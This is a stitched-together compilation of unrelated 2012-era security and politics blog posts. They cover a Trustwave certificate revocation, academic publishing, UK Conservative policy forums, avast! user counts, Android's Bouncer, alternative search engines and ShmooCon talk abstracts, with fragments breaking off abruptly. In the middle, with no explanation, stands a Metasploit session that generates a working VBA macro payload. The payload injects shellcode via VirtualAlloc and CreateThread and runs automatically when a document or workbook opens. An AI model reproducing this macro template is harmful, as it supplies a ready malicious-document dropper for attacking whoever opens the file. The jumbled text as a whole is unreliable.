We've seen a number of comments and questions on Twitter regarding a recent Trustwave CA Policy Update to our legal repository (https://ssl.trustwave.com/CA). This update discusses a subordinate root revocation. This is a proactive revocation, of the only certificate we issued for these purposes, that is the result of careful consideration in light of recent policy changes and the changing PKI landscape. 

(The system isn’t pefect.  Ralph Merkle couldn’t get his paper on asymmetric encryption published because a reviewer felt it “wasn’t interesting.”  The greatest advance in crypto in 4,000 years and it wasn’t interesting?)

These are, of course, the same journals that are lobbying to have their monopoly business protected by the “Research Works Act,” among other things.  (The “Resarch Works Act” is a whole different kettle of anti-[open access|public domain|open source] intellectual property irrationality.)

I was, initially, a bit surprised by the study on forced citations.  After all, these are, supposedly, the guardians of truth.  Yes, OK, that’s naive.  I’ve published in magazines myself.  Not the refereed journals, perhaps: I’m not important enough for that.  But I’ve been asked for articles by many periodicals.  They’ve had all kinds of demands.  The one that I find most consistently annoying is that I provide graphics and images.  I’m a resarcher, not a designer: I don’t do graphics.  But, I recall one time that I was asked to do an article on a subject dear to my heart.  Because I felt strongly about it, I put a lot of work into it.  I was even willing to give them some graphics.  And, in the end, they rejected it.

Not enough quotes from vendors.

This is, of course, the same motivation as the forced citations.  In any periodical, you make money by selling advertising.  In trade rags, the ease of selling advertsing to vendors is determined by how much space you’ve given them in the supposed editorial content.  In the academic journals, the advertising rates are determined by the number of citations to articles you’ve previously published.  Hence, in both cases, the companies with the advertising budgets get to determine what actually gets published.

(As long as we’ve here, I have one more story, somewhat loosely related to publishing, citation, open access, and intellectual property.  On another occasion, I was asked to do a major article cluster on the history of computer viruses.  This topic is very dear to my heart, and I put in lots of time, lots of work, and even lots of graphics.  This group of articles got turned down as well.  The reason given in that case was that they had used a Web-based plagiarism detector on the stuff, and found that it was probably based on materials already on the net.  Well, of course it was.  I wrote most of the stuff on that topic that is already on the Web …)

-

Let the experts make sure your website is safe. Vulnerability Assessment is the answer.

As part of the activities that I've been developing for AP²SI I've just found this. And I could not resist sharing.

Yes, it's true that the cost of digital certificates is not, typically, very small. And this is one of the factors that have conditioned the widespread adoption of SSL on web servers, even though this mechanism would allow the authentication of those services, and would ensure the privacy of customer communications.

(The cost is not the only factor limiting the adoption of SSL, but it's surely a major factor, along with the performance.)

If you want to build more confidence in your Internet websites, or even in your intranet sites, Comodo has an offer with an unbeatable price, an offer that doesn't add the same degree of confidence of an EVS certificate, but that may be sufficient to meet your requirements.

Mechanical locks tell no tales.

Read Full Post

Slated for March 27-29, 2012, the National Institute of Standards and Technologies [NIST] has entitled the new FISSEA conference “A New Era in Cybersecurity Awareness, Training, and Education”. Venue is the NIST complex in Gaithersburg, Maryland. I highly  recommend attending the conference (and memebrship as well) for  information systems security professionals working in the United States Federal Government environs, managers responsible for information systems security training programs within federal agencies, and faculty members of accredited educational institutions who are involved in information security training and education.

Current government policy is that which the coalition partners can agree with the tribes of Whitehall, as well as each other. Oliver Letwin has asked the Conservative Policy Forum (CPF) to start looking at Conservative policy for the next election. Few of you will have heard of the Conservative Policy Forum. I attended their first "winter school" last weekend not knowing what to expect. 

What I experienced changed my way of thinking about policy formation in the modern world. The event evolved from an awkward discussion on the nature of conservatism through a great workshop on what is meant by "the big society" to a rollicking debate on the nature of democracy  in the modern world.  The underlying theme was how to reconnect political discussion with the priorities of the majority of voters, as opposed to the introverted obsessions of the Westminster village and the blogocracy and twitterati in their cyberghettoes.  

The majority of the electorate is now on-line but the backlash to political spam is gathering pace. We need a candid look at how technology is used to help progress political debate, avoiding the "dictatorship of the sysadmins" (as with automated on-line consultation systems) and neither cocooning elected representatives nor exposing them to such e-overload that they have no time to sleep - let alone think.  Putting the "party", (food, drink and physical networking) back into the Party, alongside "pseudo-social" electronic networking is a larger part of the answer than the cybernerds would have us believe. 

 The Winter School debate on the nature of the Big Society revealed a surprising degree of agreement alongside great difficulty in agreeing meaningful soundbites.  There were various comments about the "culture of volunteering", "the we society not the me society" and "social investment" but, for me "the de-nationalisation of compassion" encapsulated both what was meant and the scale and nature of the challenge. For nearly a century political debate has focussed on ways of using OPM (other people's money) to pay professionals to look after us when we are ill or in need.  The Labour government not only spent the surpluses being created when it came to office, it mortgaged the future and left central government financially and morally bankrupt and discredited.  We have now no choice but to continue the process of denationalisation. 

The challenge to the IT industry is profound. It has to switch from helping administer and police top-down steam-age. (they date from the 1918 Haldane Report), centralised, standardised, silo-based, national services. It has to work out how to help support and encourage a kaleidoscope of bottom up, Internet age, locally organised initiatives to meet community needs. The win-win solution that O2 is about to supply to Westminster and Kensington councils indicates that the Cabinet Office strategy of moving towards ubiquitous fixed and mobile broadband access to cloud-based  government data services is more than just an elegant conceptual solution. But how many other suppliers see the opportunity to leapfrog into a new, more profitable and sustainable world?  How many are more concerned to defend their current contracts and past business models?

At the heart of the big information society is the challenge of listening to what users and customers want and allowing services to evolve as those wants are informed by experience. This does not come easily to IT experts who despise customers, let alone ignorant end-users who do not do as they are expected.  Most self-styled  IT "professionals" are much more comfortable in a world where politicians have "visions", listen to Think Tank gurus and then commission consultants to specify major change programmes for which they can submit safe blame-avoidance bids.    

That leads me to the final debate at the CPF Winter School. This was on the nature of democracy. Do voters really want to have to decide on local priorities in, for example, on-line referendums?  Would they not would prefer to leave it to their elected representatives so that they can grumble when they get it wrong?  I had forgotten the supposed Voltaire quote on the best form of Government: "Benevolent dictatorship, tempered by the occasional assassination".  We live within a semi-elected dictatorship. A surprising amount of even council spend is agreed by lobbying groups in Brussels, gold plated by Civil Servants, rubber stamped by Ministers and passed on the nod by the Westminster Parliament. An example is the waste directives.   But earlier in the conference we had been told that obsession with "Europe" is an electoral turn-off. Barely 4% think it a top issue. "Its the economy stupid", followed by unemployment, race and immigration and law and order. 

The "answer" to the "democratic deficit" had meanwhile been addressed in the discussions on how the Conservative Policy Forum should operate. Nearly half of constituencies now have branches and some are already as strong as the best of the old CPC branches.  The big difference is that instead of discussing briefs on the issue of the  day they are have been asked to work on ideas and material for the 2015 manifesto. More-over they will be encouraged to bring in outside experts and non-members to ensure that their recommendations are likely to command support from the majority of the electorate.  I will therefore be asking the members of the Conservative Technology Forum to help inform debate at the constituency and regional level on how technology can and should be used to support local needs - not used as an excuse for imposing central diktats. I will also be asking them to help trial tools for on-line debate and how to use these to ensure discussions reflect the views of the mass of participants, not just those  with the time to drown out those who disagree with them.

As regular readers will know, my motto is "The silent majority gets what is deserves, ignored." If you want to participate, find your local the Conservative Policy Forum group  or join the Conservative Technology Forum (sooner or later we will get round top updating the website  meanwhile the on-line activity is via Linked In). Be active in your local constituency party as well.  If you are not a Conservative,  join the party of your choice and take part in their routines for policy formation. 

If you fail to do so, you will have helped preserve a world where policy ideas emerge from Think Tanks, are refined in negotiation between the wonks of Brussels and Westminster and the lobbyists of big business, to be implemented  by civil servants looking forward to second careers as regulators or as consultants with those who employ the lobbyists.   

Of course, from a more global point of view… you could argue that -20 degrees is actually a pretty nice summer temperature, especially in Antarctica.  They have “summer” there right now.  And that brings me nicely to the ‘active users’ count.   To make sure we have decent understanding how many users have our product installed, we measure how many are getting an update of the virus definitions database.   And, with each update, we can locate the user to a particular country or region based on the GEO IP.  It is heartwarming to see that every “Antarctic summer” we have a handful of avast! users updating their virus definitions from Antarctica.  So whoever is down there: Enjoy the summer, mulled wine, good book and internet browsing.  Or what else you do getting through those temperatures.  And please send me a note on how well avast! antivirus is handling in the local weather

VIDEO:   here is a recent map of the global avast! presence.  Pretty good coverage.

We are a non-profit tech company that develops free and open source software for information collection, visualization and interactive mapping.

Facebook Readies IPO Filing
- A LOT of people use Facebook
- A LOT of money

Lion 10.7.3
- Matt Hasn’t upgraded
- Bill and Patrick have had zero problems

Basic FreeNAS Setup
- We use it, it’s nice
- Matt is looking for his own personal setup
- Western Digital TV perhaps?
- Matt might be buying a PS3 or Xbox 360

FBI plans social network map alert mash-up application
- Why?
- There are plenty of existing services, why build something new?

New RIM CEO
- Won’t help
- No vision

Hurricane Labs Boastcast
Modern Search Engines for the Contemporary User
Gaining Access to a Check Point Appliance – Physical Access Trumps All

Hack of the Week
Anonymous hackers leak Scotland Yard-FBI conference call

App of the Week
Lookout Mobile Security Threat Tracker

Meanwhile, in BotNet news, we learn of the apparent rising from the ashes of the proverbial bitwise pyre by Kelihos, and it’s nefarious blunderings out and about; regardless of the declared morte of this pesky bit of code, it is evidently the new gift that just keeps on giving… Oops.

Ʊ

SpiderLabs customers are frustrated with PDF reports:

• You can’t search them
• You can’t sort them
• You can’t assign pieces of them
• You can’t trend them

PenTest Manager, the reporting tool used by Trustwave SpiderLabs to manage, track and report results of penetration tests, was designed specifically to solve these issues. We realized that the way most consulting company’s delivery reports just doesn’t work.

This week, we pushed out a new set of reporting updates for Trustwave PenTest Manager which is now available for all customers. Why? Reporting enhancements are one of the most requested features we get from customers.

The major updates are:

• Customized Methodologies - Within SpiderLabs, we understand that a standard, canned approach to risk assessments does not always work. Business risks differ across organizations; technologies change and evolve, and therefore require different tools, different techniques, and a fresh approach. We have enhanced our online reporting to now support customized test methodologies, so get your ATMs, SCADA systems, and arduino home automation systems ready for SpiderLabs deep technical security reviews.
• Tag and Report on Specific Findings– Now you can add a personalized tag to a finding in the form of a keyword or term, and then generate reports based on your tagged findings. Group and report security findings by business unit, engineering group, geographical region, or any other way you want to slice the data. This tagging and filtering works at both a test level and a finding level to provide complete control to generate customized reports.
• Overall CVSS Scoring – Since PenTest Manager is the only online reporting tool for consultant-led penetration testing, we are in a unique position to not only provide Base CVSS scores, but also provide temporal and environmental vulnerability information that accurately reflects the risk to a business through our hands–on testing approach. Automated tools have no way to understand and report the Overall CVSS score given the complexities of diverse technical environments and lifecycle of exploits…but we do!
• Performance Enhancements – Nobody wants to wait for data to load or reports to generate, so we took significant steps to speed up the responsiveness of PenTest Manager by refactoring key areas for performance.

Stay tuned for more enhancements in the near future. For additional info on PenTest Manager, check out the website and videos: https://www.trustwave.com/pentest-manager.php

msf > use payload/windows/exec
msf  payload(exec) > set CMD calc
CMD => calc
msf  payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf  payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
        Dim  Xlbufvetp As LongPtr
#Else
        Dim  Xlbufvetp As Long
#EndIf
        Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
        Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
        For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
                Wyzayxya = Hyeyhafxp(Zolde)
                Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
        Next Zolde
        Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub

Cunningly envisioned by Corning

Traditionally, the barriers of entry for developers in the Android ecosystem have been low to get their apps placed in the official Market. This was by design, allowing Android to sprint past other smartphone platforms in adoption rates, since many apps that users wanted were likely to be there before they hit other platforms. The downside is that app authors choosing to bundle malicious, or borderline malicious apps had an easier time with distribution.

By contrast, the iPhone ecosystem represented a more closed, vetted, and more expensive environment for developers to launch their apps. This resulted in steady growth, but the more rigid process of an app making it to their official App Store deterred the more unsavory app developers from spending the extra effort to circumvent controls. In short, it was easier to spread bad things, or borderline bad things on the Android smartphones.

The new effort, called Bouncer, aims to silently scan the marketplace for rogue and borderline apps, largely transparently to the user. When a new app upload is attempted by the developer, Bouncer will do a preliminary scan to determine whether it acts malicious, or borderline.

Hiroshi Lockheimer, VP of Engineering, Android, explains in his blog on the subject that the effort “provides automated scanning of Android Market for potentially malicious software without disrupting the user experience of Android Market or requiring developers to go through an application approval process.”

Bouncer aims to run each app in a simulated cloud-base environment to watch for malicious activity. It will also scan for changes in existing apps. If it detects an app has changed, it will red flag it for scanning, keeping existing apps (hopefully) more malware-free. Additionally, developers exhibiting a pattern publishing malicious apps may be blacklisted. Is it working? In the second half of 2011, Mr. Lockheimer says “we saw a 40% decrease in the number of potentially-malicious downloads from Android Market,” so progress seems positive.

With an estimated 11 million apps available for Android, and a year-over-year growth rate of 250% according to Mr. Lockheimer, there’s a lot of scanning to be done. But this also speaks toward the success and ubiquity of the platform, and perceived value to users. In that department, Android has done quite well indeed.

This past year, Homeland Security officials and officers from U.S. Customs and Border Protection conducted a national sweep of stores, flea markets and street vendors looking for counterfeit goods. Operation Fake Sweep collected $4.8 million worth of counterfeit jerseys, ball caps, and T-shirts. Ahead of this weekend’s Super Bowl, authorities said they seized nearly 42,000 phony Super Bowl sportswear items and merchandise worth $5 million. Fake jerseys can be bought for about $80 each. But according to nflshop.com, authentic jerseys cost between $150 and $300.

The Better Business Bureau (BBB) warns about buying counterfeit team merchandise and tickets online. They have found fake websites that appear to sell merchandise but are fronts for collecting credit card numbers and personal information which could lead to identity theft or drained bank accounts. The best way to ensure that you get official sports gear is to buy directly from the team or league websites, or from official vendors at the stadium.

The BBB also warns that buying tickets online can be a rip-off. Thousands of Super Bowl tickets are currently listed on craigslist, but the site offers no guarantees of any kind and does not require identification of its listers. Buying in person isn’t always an improvement, since scammers can fake tickets.

The Department of Transportation (DOT) is warning consumers about the possibility of Super Bowl tour package scams – specifically, scams that appear to promise game tickets, but fail to produce. DOT cautions travelers that if a game ticket is not specifically mentioned in advertisements or other solicitation material or listed as a tour feature, the ticket is probably not included. Fans should carefully review travel packages advertised online and make sure tickets and accommodations are fully guaranteed.

In general, avoid scams by being skeptical of:

• Offers that sound “too good to be true”
• Pushy sales tactics
• Poor quality of merchandise
• Offers that require wire transfer of funds

A good way to gauge the trustworthiness of any website is to take a look at the avast! WebRep rating. The rating icon in located beside the address bar in your browser. Click on it to see the overall rating and to add your own rating.

This article by Kelly Jackson Higgins is very much to the same point - How To Spot A Fake Facebook Profile - though it’s likely to be useful in many other contexts, not just support scams. (More about support scams later, soon, though.)

It’s based on research by Barracuda Networks, by the way, as discussed at the Kaspersky Lab Security Analyst Summit 2012, which is apparently happening now.

David Harley CITP FBCS CISSP
Small Blue-Green World/AVIEN
ESET Senior Research Fellow

kitten, by Clevergrrl

Have you checked out ISSA Connect yet? The next issue is up there with my column, No Bubble People.

We must assume malware will end up in our network. Unless we treat our users like the Boy in the Bubble, they will click things and infect themselves—many times without even realizing it. This month’s column discusses the war we face understanding that we cannot fight or even win every battle.

If you are a member, log into ISSA Connect and join the discussion! Interact with great professionals globally as well as the authors that you enjoy reading every month. If you are not a member, sign up today!

Possibly Related Posts:

• January 2012 Roundup
• Links for 2012-01-17
• Links from 2012-01-07 through 2012-01-11
• Links for 2012-01-05
• Herding Cats: Persona You (January 2012)

Clearly, Craig from ThatsNonsense.com also thinks that hoaxes are a significant nuisance and worse, judging from a very-much-to-the-point article he’s contributed to Facecrooks.

While his arguments to the effect that there is no such thing as a harmless hoax won’t be particularly new to old-school hoaxwatchers, their application in the particular context of Facebook (though they’ll apply to other social networks too, of course) is right on the button.

Talking of a hoax that’s clearly doing harm, Facecrooks.com has teamed up with  ThatsNonsense.com, Hoax-Slayer, The BULLDOG Estate and Privacy and Security Guide to try to reduce the impact of those unpleasant chain messages that try to persuade you to forward them by convincing you that if you do, the children whose photographs they use will benefit from medical treatment.

No-one is making treatment of sick children conditional on the posting of chain-messages. And the unauthorized misuse of the photos of real sick children is obviously hurtful to their parents.

David Harley CITP FBCS CISSP
Small Blue-Green World/AVIEN/Mac Virus
ESET Senior Research Fellow

Here’s something that most of us around DC have to worry about … either directly or indirectly through our enterprise users. First it was a spiked PDF document disguised as a CFP. A few days later it was a list of conference attendees in a booby-trapped ZIP file. Now it’s back to malicious PDF files that install a Trojan that mimics Windows Update. Seculert and Zscaler describes this most recent threat in their “The MSUpdater Trojan and Ongoing Targeted Attacks” report they released a few days ago. The paper describes how attackers continue to target government contractors with the goal of stealing sensitive information using complex and difficult to detect Trojans that gain backdoor access to systems. Ah … the fight goes on.

via myce.com

A joint report was just released that details attacks that have been targeted at government contractors since 2009. The attacks involve phishing emails under the guise of inviting people to conferences.

The report by Seculert and Zscaler, details that the phishing emails contain PDFs that when opened exploit Adobe Reader flaws. These files then install an “MSUpdater” trojan, which does a very good job of posing as a legitimate Windows Update process. What really happens is that the trojan provides backdoor access into the network, giving the attackers unfettered access to very sensitive files, for as long as the trojan remains active.

The report states, “Foreign and domestic (United States) companies with intellectual property dealing in aero/geospace and defense seem to be some of the recent industries targeted in these attacks.” The report does not detail exactly which companies have been involved.

Continued here.

#####

Please let us know what you think. What controls could the government use to mitigate this threat? Today’s post image is from MyAntiSpyware.com.

Oops. Apparently, an FBI conference call was tapped by Antisec and they managed to listen in on a discussion between the FBI and their UK counterparts.

The call was posted to YouTube:

I wasn’t sure if this was authentic but, I have to admit if I was a betting man I would have said yes. And, sure enough the FBI stated as much today.

From The Washington Post:

The FBI said the information “was intended for law enforcement officers only and was illegally obtained.”

“A criminal investigation is under way to identify and hold accountable those responsible,” the bureau said in a statement.

It’s not clear how the hackers got their hands on the recording, which appears to have been edited to bleep out the names of some of the suspects being discussed.

Rather interesting to hear their side of things even if it is as a fly on the wall.

Source: Article Link

(Image used under CC from Wilheln)

In this episode we talk about Symantec. We introduce a very cool SpearPhishing tool (which is free), the VeriSign attack and we discuss RFID implications and microwave cooking directions for credit cards.

Links for this Episode:

1. New SpearPhising tool


2. VeriSign Hack


3. RFID and Credit Cards.


4. Offensive Countermeasures in Orlando!

Video Feeds:

When I started my investigations, I had a limited number of data sources: The firewall logs and a network monitoring appliance. No log management solution and the server was turned off “to avoid more problems” (OMG!). The firewall logs gave me of course some relevant information but what about the network monitoring appliance? This is the same kind of appliance that I’m using during the BruCON conference to keep an eye on the visitors traffic. Very nice statistics can be generated. Basically, this appliance performs three tasks:

• Collection of all network flows + statistics (like Netflow)
• IDS (packets are analyzed via a built-in Snort)
• Web categorization

My investigations continued on this appliance and, as you can imagine, I found a multitude of evidences:

• Snort alerts (IRC traffic, id, wget, root alerts)
• Unusual traffic from servers to the Internet
• Suspicious web sites (domains & categories)

By having a look at the information reported by the appliance, the customer could at an early stage (even in real-time!) be alerted of the attack. But those features were simply… not used! The appliance was installed to monitor the network performances, that’s it! But it could do much more!

That’s an effect of the “Microsoft Syndrome“! What is this? I found a good definition on computerworld.com:

“There are several symptoms. One is when a tech company becomes so successful in a market and grows so quickly that it overlooks potential new markets. Another is when a tech company gets so large that it becomes increasingly difficult for it to innovate.“

From my point of view, I would like to extend this definition on the technical aspect of IT products:

“Another symptom is when a software becomes so complex that you only use a few percentage of its features and forgot or don’t know how to use the others.“

A typical example is Microsoft Word. I’m a Word user but, honestly, I must use 10% of all the features! Sometimes, I’m working on RFP which go very deep in the feature requirements and, finally, most of them will remain unused or unimplemented.

I think it’s time to remind the principle of “more with less“. Implementing security solutions is very expensive and budgets are often frozen or reduced. If you put some (lot of) bucks into a solution, be sure to use it at 100%! Read the manuals (you know, “RTFM!”), follow trainings, invest some time! Sometimes, cool features could be used for other purposes and increase the ROI! This reflexion goes in the same direction as one of my previous article about implementing security controls using Nagios.

When on the Internet, how do you find things? Many use a search engine. Currently the most popular search engines that people flock to are Google, Yahoo, Baidu, and Bing. As of January 2011 approximately 98% of all web searches are done on these sites. However, there are quite a lot of other search engines that make up the smaller 2%. Some with many features that aren’t available from the big four. Here are a few that tend to come up often in Internet discussions for being unique with features and results.

blekko
https://blekko.com/

blekko is unique search engine that focuses more on quality of results than on quantity of information. Unlike Google, they specifically do no want to collect all the of the world’s information or make it searchable. They remove low quality and spam sites (who focus more on monetization rather than providing information) from their index. What makes blekko unique from other search engines is that they rely on “human curation,” which relies on it’s users to help tag sites to increase the quality of the results.

blekko provides the ability to filter the results based on their defined relevance or date and blekko shows common tags so you can narrow your search base. blekko also provides the ability to change search preferences, with options such as ads displayed, secure searching (HTTPS), disabling Facebook features, and safe search.

DuckDuckGo
http://ddg.gg

DuckDuckGo is a Perl based search engine that focuses on delivering quality results while respecting users’ privacy. Two privacy issues they focus on are the search bubble and tracking. They even offer a Tor hidden service. DuckDuckGo’s website is also available over SSL.

One of the most unique things DuckDuckGo provides are the !bang syntax searches. With the !bang syntax one can narrow their search to a specific type of results or a specific site. They support hundreds of sites, and they have a complete list of available !bang commands here.

DuckDuckGo provides the ability to adjust search settings including, safe search, region, 0-click result, secure searching (HTTPS), re-directs, and user themes.

ixquick
https://ixquick.com

ixquick is a European based search engine that primarily focuses on privacy. Their privacy policy isn’t as neatly setup as DuckDuckGo, but it is very thorough in explaining their strong stance. In the process of protecting privacy and the security of their users they offer their search over SSL. ixquick’s results are mostly assembled from other popular search engines, of which they don’t specifically list. In the results, one has the ability to hone in on a specific type of result using their unique “Power Search Refinement.”

Many settings and preferences can be set – clustering of results, secure searching (HTTPS), and anatomizing picture and video searches.

whostalkin
http://www.whostalkin.com

whostalkin is a powerful search engine that aggregates results across several different sites and resources. Its primary focus is on searching social networking sites and blogs, ie: FriendFeed, Twitter, identi.ca, wordpress.com, and several others.One can focus their results on a specific division: news, blogs, or social networking, and various other networks.

The main categories that whostalkin makes searchable are: blogs, news, networks, videos, images, forums, and tags. At the time of this writing whostalkin does not provide a way to further customize usage or results besides the category selection.

YaCy
http://www.yacy.net/en/

YaCy is a P2P, decentralized search engine. Unlike most search engines where you visit a website on the Internet, you install YaCy and load up the search page locally. YaCy requires installation because it queries peers in the P2P network. By default YaCy expects you to contribute to the YaCy network. While it is contributing the program crawls various websites on the Internet and stores the results of the crawl locally. When someone else does a search and if their client connects to yours it will query your crawl cache for results.

YaCy’s main philosophy is that they want to keep information free and uncensored. They argue that other search engines are centralized which could potentially lead them to be censored, blocked, removed, or spammed. YaCy is open source, free software and is completely transparent. They provide more in-depth explanation of their philosophy here.

There are several settings that can be adjusted in YaCy, many revolve around the network itself. You can adjust how much caching it does and how much you want to contribute to the network as a whole.

There are several other great search engines that help make up the other 2% of the market share. This list is to highlight those that have unique features that aren’t found or commonly found together on other search engines. Wikipedia has an article of search engines (past and present) in a timeline format of when they were released.

Last night we put out a post with the ShmooCon 2012 FireTalks winners so this morning we thought we’d follow up with a quick article on some of the other talks that occurred last weekend. This post is dedicated to the talks on Friday night. Thanks to Bulb Security and IronGeek for recording and processing the videos so fast!

And finally be sure to check back to the master Firetalks post. It provides the core content as well as quick links to all update blog posts.  Well on to the videos…

“Exploiting PKI for Pentesters”

by Thomas Hoffecker

Based upon my hour long talk presented at DerbyCon and HackerCon. This 15 minute version is specifically aimed at pentesters. PKI provides a large source of information to pentesters. Signed and encrypted email establishes a level of trust. Many organizations employ PKI but do not provide much public information about it. Pentesters are already trained to find this information using the recon phase of pentesting. Analysis of public PKI certificates can provide information on the internal infrastructure of the target. While the target may have deployed a split DNS architecture many times only a single PKI system is deployed. If public certificates are be accessed then potential servers and other interesting equipment can be identified since the PKI cert will contain the fully qualified domain name. While phishing success rates remain high, utilizing encrypted or signed email makes an email that much more trust worthy. It also ensures that spam and virus scanners at the mail server cannot read the email contents. Encrypting the email provides assurance that only the targeted subject can open and read the email. User security awareness training teaches users that signed and encrypted email is absolutely safe. Beyond my existing talks’ content I will demonstrate means to find information of specific corporate PKI implementations. Provide examples to obtain PKI email certificates from public sources for those that do not publish or otherwise distribute PKI email certificates. I will also discuss recently publicly revealed attack against smartcards that store PKI certificates, examples of these smart cards include the DoD CAC and the HSPD-12 PIV cards.

“Bending SAP Over & Extracting What You Need!”

by Chris John Riley

At the heart of any large enterprise, lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many “red pen” items on penetration tests and audits alike… but no more! We will no longer accept the cries of “Business critical, out-of-scope”. The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERM, and it’s our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It’s time to scrub this SAP system clean with SOAP!

“ROUTERPWN: A Mobile Router Exploitation Framework”

by Pedro Joaquin

Routerpwn is a mobile exploitation framework that helps you in the exploitation of vulnerabilities in network devices such as residential and commercial routers, switches and access points. It is a compilation of ready to run local and remote web exploits. Programmed in Javascript and HTML in order to run in all “smart phones” and mobile Internet devices, including Android, iPhone, BlackBerry and all tablets. You can even store it off line for local exploitation without Internet connection.

“Security Is Like An Onion, That’s Why it Makes You Cry”

by Michele Chubirka

Why is the security industry so full of fail? We spend millions of dollars on firewalls, IPS, IDS, DLP, professional penetration tests and assessments, vulnerability and compliance tools and at the end of the day, the weakest link is the user and his or her inability to make the right choices. It’s enough to make a security engineer cry. The one thing you can depend upon in an enterprise is that many of our users, even with training, will still make the wrong choices. They still click on links they shouldn’t, respond to phishing scams, open documents without thinking, post too much information on Twitter and Facebook, use their pet’s name as passwords, etc…. But what if this isn’t because users hate us or are too stupid? What if all our complaints about not being heard and our instructions regarding the best security practices have more to do with our failure to understand modern neuroscience and the human mind’s resistance to change?

“Five Ways We’re Killing Our Own Privacy”

by Michael Schearer

At DEFCON, I talked about how our privacy rights are under attack. Our sea of liberty is drying up due to the ever-encroaching power of the government. A litany of abuses continue to chip away at the historical foundations of privacy: administrative searches as pretexts to avoid search warrants, national security letter, and suffocating public surveillance just to name a few. Yet the government alone is not the only source of our ever-diminishing privacy. In this talk, I turn my attention…to you. Yes, believe it or not, you (and me) and the other 310 million of us in this country are also responsible for our diminished expectation of privacy. Why are we responsible? Who wants our information, and why is it so valuable? Is there anything we can do to stem the tide?

“How Do You Know Your Colo Isn’t ‘Inside’ Your Cabinet, A Simple Alarm Using Teensy”

by David Zendzian

As everyone knows, the security of your equipment starts with securing it physically. To accomplish that many will lease cabinet or cage space within the a commercial colo. However, all colos require access to your equipment (in case of fire, or other emergency). Even withstanding the emergency access I have seen colo’s enter cages and cabinets to run cables or to shorten their walk around a row in the facility. Other than installing a commercial alarm or a motion sensor camera, both of which are expensive solutions, what can be done to monitor access into your cabinet or cage. This talk will show how we have used a Teensy board from PJRC to build a simple alarm system that can be easily integrated into whatever host / network monitoring system already configured for your network.

#####

An interesting thing happened this year … none of the talks on Friday night won. Maybe this gave the Saturday presenters time to pay the judges off. This post’s featured image is from Babble.com. See ya…